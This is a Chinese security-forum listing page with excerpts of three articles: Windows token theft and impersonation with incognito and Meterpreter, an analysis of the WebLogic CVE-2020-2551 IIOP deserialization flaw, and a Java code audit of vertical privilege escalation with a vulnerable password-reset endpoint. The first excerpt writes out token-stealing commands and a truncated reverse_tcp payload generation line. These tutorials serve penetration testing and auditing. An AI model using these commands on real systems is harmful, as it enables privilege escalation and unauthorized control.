渗透技巧――Token窃取与利用

layout: posttitle: 渗透技巧——Token窃取与利用0x00 前言在之前的文章《渗透技巧——程序的降权启动》介绍了使用SelectMyParent降权的方法,本质上是通过token窃取实现的。这一次将要对token窃取和利用做进一步介绍,测试常用工具,分享利用技巧。0x01 简介本文将要介绍以下内容;Token简介Metasploit中的incognitoWindows平台下的incognitoInvoke-TokenManipulation.ps1用法利用token获得system权限利用token获得TrustedInstaller权限0x02 Token简介Windows有两种类型的Token:Delegation token(授权令牌):用于交互会话登录(例如本地用户直接登录、远程桌面登录)Impersonation token(模拟令牌):用于非交互登录(利用net use访问共享文件夹)注:两种token只在系统重启后清除具有Delegation token的用户在注销后,该Token将变成Impersonation token,依旧有效实际测试使用Test\a登录后注销,再使用administrator登录查看token:incognito.exe list_tokens -u能够获取到已注销用户Test\a的token,如下图利用该token执行calc.exe:incognito.exe execute -c "TEST\a" calc.exe后台显示进程calc.exe的用户名为a,如下图0x03 Metasploit中的incognito在Metasploit中,可使用incognito实现token窃取,常用命令如下:加载incognito:load incognito列举token:list_tokens -u查看当前token:getuid提示至system权限:getsystemtoken窃取:impersonate_token "NT AUTHORITY\\SYSTEM"从进程窃取:steal_token 1252返回之前token:rev2self or drop_token实际测试Client:msfpayload -p windows/meterpreter/reverse_tcp LHOST=192.168. 阅读全文 箭头
7个评论-3347个浏览
收藏 收藏

漫谈 WebLogic CVE-2020-2551

作者:r4v3zn(白帽汇安全研究院) 背景 2020 年 1月14日,Oracle 发布了大量安全补丁,修复了 43 个严重漏洞,CVSS 评分均在在9.1以上。 其中 CVE-2020-2551 漏洞,互联网中公布了几篇针对该漏洞的分析文章以及POC,但公布的 POC 有部分不足之处,导致漏洞检测效率变低,不足之处主要体现在: 公布的 POC 代码只针对直连(内网)网络有效,Docker、NAT 网络全部无效。 公布的 POC 代码只支持单独一个版本,无法适应多个 weblogic 版本。 注: 1. 经过大量的测试,我们的 POC 可稳定运行在多个操作系统、多个 weblogic 版本、多个 JDK 版本以及 Docker 网络中。 2. 以上测试及分析环境全部基于内部环境。 漏洞分析 通过 Oracle 官方发布的公告是可以看出该漏洞的主要是在核心组件中的,影响协议为 IIOP 。该漏洞原理上类似于RMI反序列化漏洞(CVE-2017-3241),和之前的T3协议所引发的一系列反序列化漏洞也很相似,都是由于调用远程对象的实现存在缺陷,导致序列化对象可以任意构造,并没有进行安全检查所导致的。 协议 为了能够更好的理解本文稿中所描述 RMI、IIOP、GIOP、CORBA 等协议名称,下面来进行简单介绍。 IDL与Java IDL IDL全称(Interface Definition Language)也就是接口定义语言,它主要用于描述软件组件的应用程序编程接口的一种规范语言。它完成了与各种编程语言无关的方式描述接口,从而实现了不同语言之间的通信,这样就保证了跨语言跨环境的远程对象调用。 在基于IDL构建的软件系统中就存在一个OMG IDL(对象管理组标准化接口定义语言),其用于CORBA中。 就如上文所说,IDL是与编程语言无关的一种规范化描述性语言,不同的编程语言为了将其转化成IDL,都制定了一套自用的编译器用于将可读取的OMG IDL文件转换或映射成相应的接口或类型。Java IDL就是Java实现的这套编译器。 RMI、JRMP、JNDI Java远程方法调用,即Java RMI(Java Remote Method Invo 阅读全文 箭头
8个评论-3625个浏览
收藏 收藏

Java代码审计之垂直越权

  垂直越权的业务场景主要是低权限的用户可以访问高权限用户的功能,或者是用户在没有通过认证授权的情况下能够直接访问需要通过认证才能调用的接口或者文本信息。 审计思路   主要原因还是权限校验细粒度未覆盖接口,首先可以通过pom.xml、web.xml或者是相关注解进行一些权限控制措施的定位。例如通过web.xml找到权限过滤器,检查对应的安全控制措施,例如相关的接口进行访问前会对当前会话进行登陆检查等。然后结合实际业务检查是否存在遗漏或者缺陷,这里就是相关Filter、Interceptor以及类似Shiro等权限控制框架等措施的审计了。   如果没有发现相关的权限校验机制或者覆盖面不全的话,那么很可能相关的业务接口就会存在垂直越权问题了。可以从服务端或者view层入手,常见的场景如下: 常见场景 仅对登陆态进行检查   比较常见的权限控制措施是防止非登陆的用户进行业务操作,但是其权限细粒度仅仅覆盖登陆的会话,没有进一步进行细化,例如检查是否是管理员还是普通用户。从而导致越权漏洞的产生。   例如如下接口,主要实现的是管理员通过id重置用户密码的业务,整个过程只需要传入需重置的用户id以及新密码,即可发送对应的邮件给相关用户并完成重置操作。 /** * 重置密码 * * @param id * @return */ @RequestMapping("/resetpwd") public String resetpwd(@RequestParam("id") Long id,@RequestParam("newPwd") String newPwd, HttpSession session) { try { SecurityLoginaccountDto loginAccount = loginaccountService.get(id); newPasswordEmail(loginAccount.getLoginName(), loginAccount.getEmail(), newPwd); loginaccountService.resetpwd(id, CryptographyUtil.hashMd5Hex(newPwd)); PageMessageUtil.saveSuccessMess 阅读全文 箭头
3个评论-3247个浏览
收藏 收藏
更多

加载中,请稍候

请求超时,点击重新加载

提问
写文章

装饰 推荐专栏

换一换

数智科技
鹰酱那些事
app漏洞
靶机狂魔

装饰 权威推荐

广东省应急响应平台
广东网警
广东省计算机信息网络安全协会
专栏
小密圈

装饰 安全达人

换一换

健康的乌冬面
ChooSen
温婉的服饰
别黑凡皇
读芯术
妈妈喊我回家吃饭
神勇的冬天
暖阳下的好日子